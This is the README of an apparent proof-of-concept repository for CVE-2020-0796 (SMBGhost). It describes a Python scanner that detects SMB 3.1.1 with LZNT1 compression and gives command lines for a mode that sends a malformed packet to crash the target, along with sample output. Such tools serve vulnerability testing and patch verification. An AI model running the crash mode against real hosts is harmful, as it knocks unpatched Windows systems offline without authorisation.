Lightweight PoC and Scanner for CVE-2020-0796 without authentication.# CVE-2020-0796-PoC-and-Scan
An even more simple PoC and Scanner for CVE-2020-0796, as it uses static packets. There is a protection to prevent accidental usage on public IPs (don't do that) and an on/off switch to flick crashing. Only requires vanilla Python 3!
Scan mode:
```
python3 poc-and-scan.py 10.0.0.15 N
```
Scan+Crash mode:
```
python3 poc-and-scan.py 10.0.0.15 Y
```
Output:
```
SMB v311 with LZNT1 detected.
Sending malformed packet per user request!
```
## License
Licensed under the WTFPL license.
[4.0K] /data/pocs/95b5bc8155297bb9506d7ef9fccb4175760a8b64
├── [ 462] LICENSE-WTFPL
├── [2.0K] poc-and-scan.py
└── [ 518] README.md
0 directories, 3 files